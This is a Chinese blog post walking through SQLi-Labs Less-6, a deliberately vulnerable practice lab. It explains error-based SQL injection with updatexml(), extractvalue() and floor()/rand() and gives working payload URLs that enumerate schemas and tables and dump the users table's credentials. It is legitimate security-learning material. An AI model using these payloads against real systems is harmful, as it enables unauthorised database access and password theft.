SqliLab_Mysql_Injection详解_字符型注入(三)_布尔盲注/报错注入(6)

最新推荐文章于 2022-08-17 17:35:11 发布
最新推荐文章于 2022-08-17 17:35:11 发布
阅读量545 收藏 2
点赞数 1
分类专栏: # MYSQL注入学习 文章标签: 布尔盲注 报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41260930/article/details/102650879
版权

文章目录

1. SqliLab_Mysql_Injection详解_字符型注入(三)
1.1. SQL注入(布尔盲注)_报错注入
1.1.1. 原理

由于服务器在接受请求后,返回的页面存在报错提示的情况,可以使用一些特殊的函数在特殊的情况下(如开启了mysql_error()),返回所想要获取的数据库信息;

1.1.2. 常用的函数:

UPDATEXML(XML_document,XPath_string,new_value)函数:

  • 第一个参数XML_document:XML_document是String格式,为XML文档对象的名称;
  • 第二个参数XPath_string:XPath_string (Xpath格式的字符串);
  • 第三个参数new_value:new_value,String格式,替换查找到的符合条件的数据;

报错原理:Xpath格式语法书写错误的话,就会报错;
Extractvalue(xml_frag,xpath_expr) 函数:

  • 第一个参数xml_frag: 目标xml文档;
  • 第二个参数xpath_expr: 利用Xpath路径法表示的查找路径;

报错原理:Xpath格式语法书写错误的话,就会报错;
注意:

  • updatexml(1,concat(0x23,payload,0x23),1),在concat查询语句后面添加一个标识符,如0x23(#),0x7c(|),0x7e(~)等,因为有的时候报错信息会设置长度限制,添加标识符可以避免显示不完全;
  • updatexml()和extractvalue()都是最大爆32位。UPDATEXML()函数和EXTRACTVALUE()函数都只能爆出32位数据,如果要爆出32位以后的数据,需要借助MID() 函数来进行字符截取从而显示32位以后的数据;

mid(string,start,[length])函数:

  • 第一个参数string:要截取的字符串;
  • 第二个参数start:从字符串的第start位开始截取;
  • 第三个参数length:截取的长度(最长为32位);

floor()报错注入:
使用函数:
floor(): 去除一个数的小数部分,并向下取整数;rand(): 产生0~1的随机数;
rand(x): 每个X对应一个固定的值,但是如果连续多次执行会变化,但是可以预测;如rand(0): 产生的序列是011011;
group by :根据by 后面的字段对查询结果进行聚合分组;
EG:

> select floor(rand(0)*2) from users ;

在这里插入图片描述
当floor(),rand(),group by 三个函数在续表中查询时由于rand()产生值的序列导致了主键冗余报错(表中的记录必须大于3条)
具体原理:
查询第一条记录,rand(0)得键值0不存在临时表,执行插入,此时rand(0)再执行,得1,于是插入了1;
查询第二条记录,rand(0)得1,键值1存在临时表,则值加1得2;
查询第三条记录,rand(0)得0,键值0不存在临时表,执行插入,rand(0)再次执行,得键值1,1存在于临时表,由于键值必须唯一,导致报错;
EG:
报错显示当前使用数据库名;

> select count(*),concat(0x7c,database(),0x7c,floor(rand(0)*2),0x7c)as x from information_schema.tables group by x;

在这里插入图片描述
报错显示当前使用数据库名为(security),报错原因是因为语句进行查询后再用group by 分组时导致主键冗余;
(极少特殊情况能用到的函数有polygon()GeometryCollection()multipoint()multilinestring(),linestring(),multipolygon())

2. SqliLab关卡(包含6)(图片占据空间太大,payload具体返回情况均写在每条payload下的注释中)
2.1. SqliLab-6(报错注入(双引号闭合)):
2.1.1. 初始界面

在这里插入图片描述

2.1.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到‘id’为输入参数,所以构造判断注入点链接;
尝试使用一般的单引号(’)闭合参数;
EG:

> http://192.168.1.104/sql/Less-6/?id=1' and 1=1 --+
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;

在这里插入图片描述
EG:

> http://192.168.1.104/sql/Less-6/?id=1' and 1=2 --+
  //服务器返回页面正确(预期错误),尝试用(")代替(')进行构造;;

在这里插入图片描述
EG:

> http://192.168.1.104/sql/Less-6/?id=1" and 1=1 --+
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
> http://192.168.1.104/sql/Less-6/?id=1" and 1=2 --+
  //服务器返回页面错误(预期错误),判断出参数‘id’存在注入,闭合字符为【"】;

由此,判断出参数‘id’存在注入(or/xor一样),闭合字符为【"】;
在注入点判断过程中,可以发现,服务器在接受请求后,返回的页面存在无回显的情况,这时候如果再利用UNION联合查询法查看显位就失效了,只能基于SQL语句的True or False进行盲注了,但是盲注过于费时间(一键通杀盲注脚本等除外),可以考虑服务器返回页面是否存在报错情况,如果存在可以考虑使用报错注入的方式获取想要的信息,如在SqliLab-5盲注测试中的注入点判断时出现报错提示( You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘" and 1=1 – ’ LIMIT 0,1’ at line 1);
尝试使用错误的闭合字符来构造payload,观察服务器返回页面是否存在报错情况(如在正确的闭合字符后加上一个或者多个单引号(’));
EG:

> http://192.168.1.104/sql/Less-6/?id="' and 1=1 --+
  //服务器返回页面错误,查看到报错信息(You have an error in your SQL syntax; check the manual that corresponds to 
  //your MySQL server version for the right syntax to use near '' and 1=1 -- " LIMIT 0,1' at line 1)
  //可能可以使用报错注入来获取想要的信息;

在这里插入图片描述
尝试使用updatexml(),extractvalue(),floor()等函数进行报错注入;
EG:
尝试报错结果能否出现预期结果(payload:and updatexml(1,concat(0x23,database()),1)–+);

> http://192.168.1.104/sql/Less-6/?id=1" and updatexml(1,concat(0x23,database()),1) --+
  //服务器返回页面错误,但查看到报错信息显示了当前使用数据库的信息‘security’,说明可以考虑使用报错注入的方式获取想要的信息;

在这里插入图片描述
服务器返回页面错误,但查看到报错信息显示了当前使用数据库的信息‘security’,说明可以考虑使用报错注入的方式获取想要的信息;

接下来的方式就可以开始进行一般SQL注入的流程了:搜集信息–>查询数据库–>查询表–>查询字段(表列名字)–>查询字段值(表行值);

2.1.3. 搜集数据库信息

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数和concat()函数构造payload;

> http://192.168.1.104/sql/Less-6/?id=1" and updatexml(1,concat(0x7c,database(),0x7c,version(),0x7c),1) --+
  //使用updatexml()函数;
------------------------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-6/?id=1" and extractvalue(1,concat(0x7c,database(),0x7c,version(),0x7c)) --+
  //使用extractvalue()函数;
------------------------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-6/?id=1" and (select 1 from (select count(*),concat(0x7c,database(),0x7c,version(),
  0x7c,floor(rand(0)*2),0x7c)as x from information_schema.tables group by x )as y)--+
  //使用floor()函数(前提是已知mysql版本为5.0以上(5.0以上才有information_schema表),这里可以通过布尔盲注或者其他的报错方式得到);

在这里插入图片描述
在这里插入图片描述

2.1.4. 查询当前使用的数据库

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

> http://192.168.1.104/sql/Less-6/?id=1" and updatexml(1,mid(concat(0x7c,(select group_concat(schema_name) 
  from information_schema.schemata),0x7c),1,32),1)  --+
  //服务器返回页面错误,但查看到报错信息显示了当前使用mysql中使用的数据库有哪些数据库,mid()函数来截取返回的较长字符串;
--------------------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-6/?id=1" and updatexml(1,mid(concat(0x7c,(select group_concat(schema_name) 
  from information_schema.schemata),0x7c),39,32),1)  --+
  //从页面返回信息中成功看到最后的标识符(|),则说明查询信息完毕;
--------------------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-6/?id=1" and extractvalue(1,mid(concat(0x7c,(select group_concat(schema_name) 
  from information_schema.schemata),0x7c),39,32))  --+
  //使用extractvalue()函数;
--------------------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-6/?id=1" and (select 1 from (select count(*),concat(0x7c,(select schema_name 
  from information_schema.schemata LIMIT 0,1),0x7c,floor(rand(0)*2)) as x from information_schema.tables group 
  by x) as y)--+
  //使用floor()函数;

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.1.5. 查询当前数据库‘security’存在的表

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

> http://192.168.1.104/sql/Less-6/?id=1" and updatexml(1,concat(0x7c,(select group_concat(table_name) 
  from information_schema.tables where table_schema=database()),0x7c),1)  --+
  //服务器返回页面错误,但查看到报错信息显示了当前使用数据库中存在的表有(emails,referers,uagents,users)
----------------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-6/?id=1" and extractvalue(1,concat(0x7c,(select group_concat(table_name) 
  from information_schema.tables where table_schema=database()),0x7c))  --+
  //使用extractvalue()函数;
----------------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-6/?id=1" and (select 1 from(select count(*),concat(0x23,(select table_name 
  from information_schema.tables where table_schema=database() limit 0,1),0x23,floor(rand(0)*2)) as x from     
  information_schema.tables group by x) as y) --+   
  //使用floor()函数;

在这里插入图片描述
在这里插入图片描述

2.1.6. 查询‘users’表的字段

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

> http://192.168.1.104/sql/Less-6/?id=1" and updatexml(1,concat(0x7c,(select group_concat(column_name)  
  from information_schema.columns where table_name='users'),0x7c),1)  --+
  //服务器返回页面错误,但查看到报错信息显示了‘users’表的字段为(id,username,password)
-----------------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-6/?id=1" and extractvalue(1,concat(0x7c,(select group_concat(column_name) 
  from information_schema.columns where table_name='users'),0x7c))  --+
  //使用extractvalue()函数;
-----------------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-6/?id=1" and (select 1 from(select count(*),concat(0x7c,(select concat(id,0x7c,
  username,0x7c,password) from users  limit 0,1),0x7c,floor(rand(0)*2)) as x from information_schema.tables 
  group by x) as y) --+    
  //使用floor()函数;

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.1.7. 查询‘users’表的字段值信息

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

> http://192.168.1.104/sql/Less-6/?id=1" and updatexml(1,mid(concat(0x7c,(select group_concat(id,0x7c,username,0x7c,
  password,0x7c) from users),0x7e),1,32),1)  --+
  //服务器返回页面错误,但查看到报错信息显示了‘users’表的字段值信息为(1,Dumb,Dumb,2,Angelina,I-kill-。。。。。。);
--------------------------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-6/?id=1" and updatexml(1,mid(concat(0x7c,(select group_concat(id,0x7c,username,0x7c,
  password,0x7c) from users),0x7e),202,32),1)  --+
  //从页面返回信息中成功看到最后的标识符(~),则说明查询信息完毕;
--------------------------------------------------------------------------------------------------------------------
>  http://192.168.1.104/sql/Less-6/?id=1" and extractvalue(1,mid(concat(0x7c,(select group_concat(id,0x7c,username,
   0x7c,password,0x7c) from users),0x7e),1,32))  --+
  //使用extractvalue()函数;

在这里插入图片描述
在这里插入图片描述
查询其他的值也是同上面的方法一致;到此,SQL注入(报错注入)基础流程差不多就结束了,所需要的信息(数据库信息,表字段值等)差不多都已经搜集到了,SqliLab-6结束。

3. 总结

通过上面的过程,可以知道,如果遇到盲注且存在服务器返回页面有报错信息提示(或者只要有服务器返回页面有报错信息提示)的情况下,可以考虑使用报错注入的方式(如果条件允许)来获取想要得到的信息,在进行注入的过程中,比较重要的是注入点的判断,以及对数据库信息的收集,后面构造的注入语句,需要根据前面的收集到的信息来构造;在报错注入的常用的三个函数中,updatexml()和extractvalue()函数使用的频率较高且构造的注入语句长度相对较短,但是floor()函数只要保证查询的表大于三条数据即可造成报错提示,更加稳定,所以在实际情况中,按条件选择使用函数(包含其他报错函数)进行报错注入。

[如有错误,请指出,拜托了<( _ _ )> !!!]

Tes789123456
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【合天网安】SQLi-Labs系列之字符报错注入(单引号和括号)
hehigoxqc606的博客
09-01 340
1、点击GET-Error based-Single quotes with twist – string,进入实验界面 在id值后面多加一个单引号,引发报错,根据提示信息,我们可以发现sql语句是使用了单引号和右括号闭合 2、可以在第二或第字段中用version()函数代替,查看当前数据库的版本,得出版本为5.5.53。 http://localhost/sqli-labs-master/Less-1/?id=-1')+union+select+1,version(),3--+ .
Sql-lab全解_sqllab,给后辈的一点建议
最新发布
m0_60721649的博客
04-08 836
引起报错的是0x7e这里也就是~符号,这里回显会执行后面的select语句同时以报错的方式回显表名:?表列:?结果:?
sql注入-字符报错注入
菲曼巴的博客
11-24 3245
试报错 看回显 暴字段 order by 3 union select 1,2,3 暴库 1,2,database() 暴表 group_concat(table_name) from information_schema.tables where table_schema =database() 或 group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+ 暴列 group_conca
SQL注入字符报错注入
studyphp123的博客
04-23 488
一、预备知识 1. SQL注入基础知识 2. SQL语句基础知识 二、实验目的 学习SQL注入字符注入、实验工具 火狐浏览器(hackbar插件) 四、实验环境 1. Windows Server 2003 2. 网址www.any.com/sqli/Less-1/?id=1 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-1/?id=1 #...
【合天网安】SQLi-Labs系列之字符报错注入
hehigoxqc606的博客
09-01 205
SQL注入介绍: SQLi,sql injection, 我们称之为sql注入。何为sql,英文:Structured Query Language,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL,Oracle以及Postgresql.Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整数据库语言,而危险的时,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常...
SqliLab_Mysql_Injection详解_字符注入(八)_POST注入_HTTP头注入(18~22)
qq_41260930的博客
10-29 787
SqlLab_Mysql_Injection详解_字符注入(九) SQL注入_POST注入(HTTP头注入) 原理 HTTP头注入是指从HTTP头中获取数据,而未对获取到的数据进行过滤,从而产生的注入。 HTTP基础 Accept:浏览器能够处理的内容; Accept-Charset:浏览器能够显示的字符集; Accept-Encoding:浏览器能够处理的压缩编码; Accept-La...
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
主要介绍了php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击的相关资料,需要的朋友可以参考下
Mysql-blind-inject.zip_Blind sql injection_SQL inject_blind_blin
09-24
SQL注入MYSQL数据库的盲注手法进行了一些简要的说明
MySQL拼接字符函数GROUP_CONCAT详解
09-08
本文给大家详细讲解了MySQL的拼接字符函数GROUP_CONCAT的几种使用方法以及详细示例,有需要的小伙伴可以参考下
Mysql注入中的outfile、dumpfile、load_file函数详解
09-09
主要介绍了Mysql注入中的outfile、dumpfile、load_file,需要的朋友可以参考下
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具目前支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注注入的一种,指的是在不知道数据返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
sql注入报错注入;这里用到的是sqli-labs/Less-1;也就是第一关,利用报错信息注入
xiaochenhang的博客
08-17 284
9、利用报错查询查至数据;这里php连接数据库(mysql)时,由于使用了mysql_error 函数进行报错,所以可以利用;updatexml('anything',concat('~',(sql语句)),'anything')7、使用联合查询,查数据库,让前面的id值为假,直接执行后面语句;extractvalue():利用报错进行注入,'~'不是xml实体,所以会报错。4、双引号正常,单引号报错,说明单引号闭合成功,存在字符注入漏洞。这里使用updatexml(,,)进行报错查询。...
07、注入篇--显错注入字符
WX公众号-小白学安全
04-05 278
文章目录原理利用防范靶场 原理 利用 防范 靶场
sqli-labs从零开始学习日记(二)
sky_die的专栏
05-08 1832
嗯,这次有个很好用的东西SQLMAP,主要是我看的视频里面他们用的是其他的软件
【Less-4】双引号报错字符注入 + 需要闭合“)“
ssrf
10-27 437
目录前言1、测试是否存在注入点 前言 提示:基于错误,单引号,数字注入,与前两关不同的是需要闭合括号 1、测试是否存在注入点 http://localhost/sqli-labs/Less-4?id=1' 尝试输入双引号 http://localhost/sqli-labs/Less-4?id=1" 源码 $id = '"' . $id . '"'; // 直接将输入的内容两边拼接上双引号 "1" $sql="SELECT * FROM users WHERE id=($id) LIMIT.
CTFHub SQL技能树-整数形注入-字符注入-报错注入-布尔盲注-时间盲注
Senimo
03-24 1617
整数注入 首先输入1查看回显: 可以看到返回SQL语句及ID和Data数据,查看列数: 1 order by 2 # 当列数为2时回显正常,接着判断回显位: 1111 union select 11,22 # 可以判断出回显点位如上,查看当前数据库版本及数据库名: 1111 union select version(),database() # 查询到当前数据库名为:sqli,...
东塔学院(sql注入字符注入报错注入,JSON,文件读取、写入 )
m0_55563900的博客
03-30 1011
什么是sql注入 SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为 称为SQL注入。 代码对带入SQL语句的参数过滤不严格 未启用框架的安全配置,例如: PHP的magic. quotes. _gpc 未使用框架安全的查询方法 测试接未删除 未启用防火墙 未使用其他的安全防护设备 字符注入1 打开页面,叫我们输入ID作为带数值的参数 Mysql查询经常用到的语句 查库:select schema_name from information_schem
sql注入学习笔记(布尔盲注
w17691058648x的博客
03-13 1064
布尔盲注是由于页面提交数据在与数据交互是完全没有在页面上出现回显数据,只会出现数据提交正确和错误俩种不同页面(报错至少语法错误会回显错误在页面上)或者无法使用联合查询。 例如:一个人不说话,如果你说对了他就点头,如果你说错了他就摇头。理解以下场景: 菜鸟:“大佬,你是不姓张?” 不说话的大佬:摇头ing 菜鸟:“我知道了,大佬你姓王是不是?” 不说话的大佬:欣慰的点头ing...
mysql授权命令grant报错_MySQL授权命令grant的使用方法详解
06-06
首先,我需要确认一下你的问题是关于MySQL授权命令grant的使用方法,对吗? 如果是的话,那么我可以为你详细讲解一下。 在MySQL中,grant命令用于授权给用户或角色访问数据库或表的权限。 grant命令的基本语法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值